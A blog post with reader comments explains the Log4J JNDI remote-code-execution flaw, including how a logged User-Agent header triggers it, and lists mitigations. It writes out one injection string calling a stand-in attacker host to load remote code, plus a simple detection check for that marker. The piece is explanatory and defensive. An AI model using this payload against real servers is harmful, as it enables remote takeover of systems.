DEV Community

Mukund Madhav

Posted on • Updated on • Originally published at mukundmadhav.com

Massive Log4j Java vulnerability: What it is & how to fix it?

Found on December 11 through a PoC (proof of concept), the Log4J vulnerability is one of the biggest vulnerabilities we have seen. It will affect tens of thousands of enterprise websites running on Java. Let's go through what happened and how to fix it.

What is Log4J?

Log4J is an extremely popular open-source library used in Java to manage application logging. Java developers favor it because of how simple it makes logging.

What does zero-day vulnerability mean?

It means the vulnerability became known before a patch was available: the developers have had “zero days” to fix the bug, so it can affect systems immediately.

What does this log4j vulnerability do?

This is a Remote Code Execution (RCE) vulnerability, meaning an attacker can make the server run external malicious code.

You might wonder how a logging library can lead to remote code execution. The reason is a feature present in Log4J: lookups. Log4J resolves ${...} expressions that appear in the text it logs, and one of the supported lookups goes through something called JNDI, which can end up loading and executing Java code.

What is JNDI?

JNDI stands for Java Naming and Directory Interface. It is an API that lets applications look up services and resources by name in an implementation-independent way. This has several uses. For instance, it enables access to Java resources without exposing the resources or the path to them.
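To make that concrete, here is a minimal sketch of a plain JNDI lookup using only the JDK. The class name JndiLookupSketch and the resource name "jdbc/ordersDb" are made up for illustration. Inside an application server the name would normally resolve to a configured resource; run standalone, there is usually no naming provider and the lookup simply fails.

```java
import javax.naming.Context;
import javax.naming.InitialContext;
import javax.naming.NamingException;

public class JndiLookupSketch {

    // Looks up a resource by its logical name and reports what happened.
    // The caller never sees where or how the resource is actually stored.
    public static String describe(String name) {
        try {
            Context ctx = new InitialContext();
            Object resource = ctx.lookup(name);
            return "found: " + resource;
        } catch (NamingException e) {
            // Without a configured naming provider (e.g. outside an
            // application server) the lookup ends up here.
            return "lookup failed: " + e.getClass().getSimpleName();
        }
    }

    public static void main(String[] args) {
        // "jdbc/ordersDb" is a hypothetical name, not one from this article.
        System.out.println(describe("jdbc/ordersDb"));
    }
}
```

The point is that the application only knows a name; whatever sits behind that name decides what comes back.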

Now, in the case of Log4J, when it sees a JNDI reference in a log message, it goes to the resource location and fetches whatever it needs to resolve the JNDI variable.
And in the process of fetching the resource (for example, over LDAP), it can download remote classes and execute them!
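The mechanism can be pictured with a toy model. This is not Log4J's code, just a sketch under the assumption that a logger scans the message for ${...} and hands whatever is inside to a resolver. ToyLookupLogger and the resolver here are invented names, and the resolver only records what it was asked for instead of contacting anything.

```java
import java.util.ArrayList;
import java.util.List;
import java.util.function.Function;
import java.util.regex.Matcher;
import java.util.regex.Pattern;

public class ToyLookupLogger {

    // Matches ${...} and captures the text between the braces.
    private static final Pattern LOOKUP = Pattern.compile("\\$\\{([^}]+)\\}");

    // Replaces every ${key} in the message with whatever the resolver returns.
    public static String format(String message, Function<String, String> resolver) {
        Matcher m = LOOKUP.matcher(message);
        StringBuffer out = new StringBuffer();
        while (m.find()) {
            String value = resolver.apply(m.group(1));
            m.appendReplacement(out, Matcher.quoteReplacement(value));
        }
        m.appendTail(out);
        return out.toString();
    }

    public static void main(String[] args) {
        List<String> requested = new ArrayList<>();
        // Stand-in resolver: a real JNDI lookup would go out to the network here.
        Function<String, String> resolver = key -> {
            requested.add(key);
            return "<resolved>";
        };
        String attackerControlled = "${jndi:ldap://hacker.com/hack}";
        System.out.println(format("User-Agent: " + attackerControlled, resolver));
        System.out.println("Resolver was asked for: " + requested);
    }
}
```

The attacker never touches the resolver directly. Getting a string into the log is enough to decide what the resolver is asked to fetch.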

So, someone can inject something like this in logs and the server would be compromised:

${jndi:ldap://hacker.com/hack}

Now the obvious question: how can an attacker know what is getting logged? After all, if you pass something and it isn’t logged, the attack is useless, right?

One of the most common things that gets logged is the User-Agent header (which helps the server identify the client’s OS, browser, etc.).

So, if we change the User-Agent request header to our malicious JNDI string and the server logs the User-Agent, remote code will be executed on the server.
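As a rough illustration of how such a header could be spotted before it reaches the logger, here is a deliberately naive check. HeaderCheck and looksLikeJndiLookup are hypothetical names, and this is a sketch rather than a fix: it only catches the literal "${jndi:" marker, and obfuscated payloads (for example, nested lookups) can slip past it.

```java
import java.util.Locale;

public class HeaderCheck {

    // Naive check: flags values that contain the literal "${jndi:" marker,
    // ignoring case. It does NOT catch obfuscated variants.
    public static boolean looksLikeJndiLookup(String headerValue) {
        if (headerValue == null) {
            return false;
        }
        return headerValue.toLowerCase(Locale.ROOT).contains("${jndi:");
    }

    public static void main(String[] args) {
        String malicious = "${jndi:ldap://hacker.com/hack}";
        String ordinary = "Mozilla/5.0 (X11; Linux x86_64)";
        System.out.println("malicious flagged: " + looksLikeJndiLookup(malicious));
        System.out.println("ordinary flagged: " + looksLikeJndiLookup(ordinary));
    }
}
```

Treat this as a way to see the problem in your own request logs, not as protection.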

There you go. Hacked 101 🎃

Who is affected?

Virtually every company using Java and Log4J, which might be most enterprise customers.

As of writing, Apple, Amazon, Twitter, Cloudflare, Steam, Tencent and Baidu are acknowledged to be vulnerable. Most probably, the real number is much higher.

For more on Java and web dev. let's connect on Twitter, Mukund Madhav

So, what’s the fix?

There are currently four solutions floating around:

  1. Upgrade Log4J to 2.15.0 or later. Here is the download link for Log4J.

  2. Set this system-level property:

log4j2.formatMsgNoLookups=true

This disables lookups in log messages, including the JNDI lookup. It works if you have Log4J 2.10 to 2.14.1.

  3. Delete the JNDI class file. It is named JndiLookup.class and sits at org/apache/logging/log4j/core/lookup/JndiLookup.class inside the log4j-core JAR.

  4. For versions 2.10 to 2.14.1, set the following environment variable to force the change:

LOG4J_FORMAT_MSG_NO_LOOKUPS="true"
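If you can't easily change the JVM launch flags, the system property from option 2 can also be set in code. Here is a minimal sketch, assuming it runs at the very start of main, before any logger is created. The class NoLookupsSetting and its methods are invented for illustration; only the property and environment variable names come from the list above. Note that isRequested only reports that the flag was asked for, not that your Log4J version honors it.

```java
public class NoLookupsSetting {

    // Names taken from the mitigation list above.
    static final String PROPERTY = "log4j2.formatMsgNoLookups";
    static final String ENV_VAR = "LOG4J_FORMAT_MSG_NO_LOOKUPS";

    // Sets the property for this JVM. Call this before any logger is
    // created; setting it later may have no effect.
    public static void apply() {
        System.setProperty(PROPERTY, "true");
    }

    // True when either the system property or the environment variable
    // is set to "true" (case-insensitive).
    public static boolean isRequested() {
        return Boolean.parseBoolean(System.getProperty(PROPERTY))
                || Boolean.parseBoolean(System.getenv(ENV_VAR));
    }

    public static void main(String[] args) {
        apply();
        System.out.println("No-lookups flag requested: " + isRequested());
    }
}
```

Upgrading is still the cleaner route; this is only a stopgap for the versions that support the flag.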

That’s it. Safe to say this will go down as one of the most obvious (but hopefully not much exploited in the future) bugs.

Not a cool day to say,

Java runs on 3 billion devices

Happy fixing 😃

Top comments (14)

Jay Jeckel

Great breakdown of the vulnerability.

This whole situation is ridiculous. Firstly, you have a logging library that, for some reason, allows arbitrary strings to be evaluated as code. Besides executions of strings being a huge danger in the best of situations, that is such a mixture of concerns that it boggles the mind. It's a logging library, the only thing it should do is log things, that's it, nothing more.

But, fine, the library's been around for a while and that is how it works. The real WTF here is that, apparently, a whole bunch of top tier tech companies just pass around input strings without sanitizing them. That is coding 101 level of stuff, don't trust anything you get from outside the system, always sanitize your input.

Crap like this is why you'll never catch me trusting my life to one of these companies' self-driving cars. How can anyone trust complex code from them when they can't even log text correctly...

HS

Just wanted to add a comment about the whole thing, but this one covers enough of it. My main question is: why would you log stuff that could potentially inject this kind of thing? So the question that pops up right on top of it is: is this really that huge of a problem?

I assumed that, when logging, companies log descriptive info. For example, if someone is trying something funny, then "this IP or this user is hitting this endpoint too much..." or something like that. The vulnerability would be to log the actual input of what was requested / sent to the server. Why??? All the security practices are against it, starting from mistakes where generic logging was logging username-password combinations because it was made so generic that it started logging anything. Next come GDPR issues and other basic decency concerns about logging what the user sent. Are we really that dependent on input data to understand the problem or detect the "attempt of hacking"? Nothing I've seen so far had this kind of problem, so the log4j issue would simply be a theoretical possibility rather than a real problem. But I am naïve. I do try to respect users and use as little storage as possible if there's no clear business request for it.

Jay Jeckel • Edited

As I understand it from other articles, in most cases they aren't logging user input in the sense that users typed stuff into a form and that text was logged; they are logging data, like the User-Agent example mentioned above, that is normally automatically generated but can be manually sent by malicious actors.

I say in most cases, because one blog I read mentioned that some of this enterprise software was using the library to explicitly log suspicious text manually entered by users, like strange input being put into username/password fields. Ironically enough, this was being done to try and catch malicious actors attempting to hack the site.

"My main question is why would you log stuff that could potentially inject this kind of the thing?"

Most devs using the library probably didn't even know the library could execute strings. Which is totally understandable, because who in their right mind would ever think a logging library would do that.

"So question that pops up right on top if it is: Is this really that huge of a problem?"

I'm not a Java guy, but I've got a few years' experience modding Minecraft, which uses the library. Thinking back, I've seen a few cases where this could be exploited in moderately popular mods.

For example, Forge, the de facto Minecraft modding framework, allows inter-mod communication, and more than a few times I've seen mods log these strings if they don't match the expected patterns. So any Minecraft server is compromised if a malicious mod is installed.

In another example, the game has slash commands in chat, and I've seen more than a few mods that log the text of malformed commands; I wouldn't be surprised if some of the built-in ones do as well. With that, a server can be compromised by any malicious user who logs on and chats.

Granted, this is just a game, but as far as games go Minecraft is big business and one where there are plenty of griefers ready and willing to take advantage.

"I assumed, when logging, companies log descriptive info. For example if someone is trying something funny than "this IP or this user is hitting this endpoint too much..." or something like that."

Ah, there's the problem: we're talking about Enterprise software here. You should always assume that the project was outsourced to underpaid interns who barely understand the problem domain, will ignore the spec, and think programming is throwing copy/pasted Stack Overflow answers at the wall until the client goes away, the company goes bankrupt, or they move on to their next job.

In other words...

"Is this really that huge of a problem?"

Oh yeah, you can bet money that to some level this vulnerability sits in just about every major Java code base at every major Java company that uses log4j. One could probably start an international sports league with the number of devs who just learned log4j could do this and are now rushing to fix their various products.

HS • Edited

Thanks for the great input. Regarding "is this that huge of a problem", I'm asking from a technical point of view, not a business one. Bad decisions were made, so of course it is, but the question is why? Regarding logging the user's browser or such, again, why? If there's a problem, ask the user for that data; why collect the data beforehand? It all boils down again to obsessive analytics that spend more money on collection and data processing than the value they bring to the business. But what do I know, right? There's a reason these managers are paid good money to make us do these things, right?
I fully agree, a logger should just log. But one more thing, just to be realistic about the impact area: in the cloud era, don't people use proxies to log network stuff? Like fire up Java apps in Kubernetes and let proxies log data like that before the app is even hit? Again, making the app log only the descriptive part when you actually have to.

Jay Jeckel

Reading posts from devs finding and patching these issues in their projects, the answer to "why" these things were being logged is as varied as the codebases. There are definitely too many cases of some pointy-haired manager demanding more analytics to impress their even pointier-haired bosses, but in many cases it is the normal reason any dev logs anything: to help ensure the code is running correctly.

To all your very reasonable questions asking "but don't they do X"... unfortunately, nine times out of ten, the answer is, yes, that is what they should do, but, no, that isn't what they do.

If you have any illusion that these big tech companies are bastions of best practices and clean code, just go read the archives on dailyWTF or rants on devrant. There is a reason that calling something Enterprise Software™ is considered an insult.

Mukund Madhav

The main brunt of this problem will be felt by companies using interns and underpaid devs in small orgs like local banks and several other IT services.

Big tech giants are well aware and will push a fix immediately, but you can't expect every small-scale startup to know about and fix this immediately. And if you're small, an attack as simple as this can wipe out your company.

I hope everyone uses Cloudflare or some other CDN, because Cloudflare has begun handling malicious user strings even for its free plan.

Mukund Madhav

In most cases, you won't know what gets logged.

But if you use any of the plethora of other Apache libraries like Struts, they are suspected to log User-Agents. So even if you don't log user input yourself, one of these other libraries might be doing it.

So instead of checking whether you log user headers/input, the best way to avoid getting into this situation is to disable JNDI for logs altogether.

HS

As @jayjeckel asked, I did have an illusion that other companies have better practices in place, like JNDI being disabled and these things being logged through proxies rather than in the app. Now I finally understand why I don't fit in at companies and keep looking for job after job every 1-2 years. It's an illusion I can't escape: expectations that are too high.

jimas13 • Edited

I suggest you correct the "zero day vulnerability" definition, as the definition you have given will confuse a lot of people. Basically, a zero-day vulnerability is one that has gone public while no patch has been developed yet, which means that it's out there and ready to be exploited.
Here's the official definition:
"A zero-day (also known as 0-day) is a computer-software vulnerability either unknown to those who should be interested in its mitigation (including the vendor of the target software) or known and a patch has not been developed. Until the vulnerability is mitigated, hackers can exploit it to adversely affect programs, data, additional computers or a network. An exploit directed at a zero-day is called a zero-day exploit, or zero-day attack."

Mukund Madhav

I wanted to simplify the Wikipedia explanation. Essentially, zero-day means that all systems are immediately prone to attack and a patch should happen immediately.

jimas13

Ok mate, but the outcome is far away from the original.

Sergiy Yevtushenko

The issue appears in two cases: when malicious input is part of the format string (which is bad practice and usually avoided) and when the format string explicitly refers to a variable (contains a pattern like ${object.property}). Frankly, I didn't even know that such syntax is supported. Finally, the issue is not applicable to the most recent versions of all supported JVM releases.

To sum up: the hype is much louder than the real issue.

Alberto Guerra González

Really good summary. Well done!

Mukund Madhav

Glad you liked it :)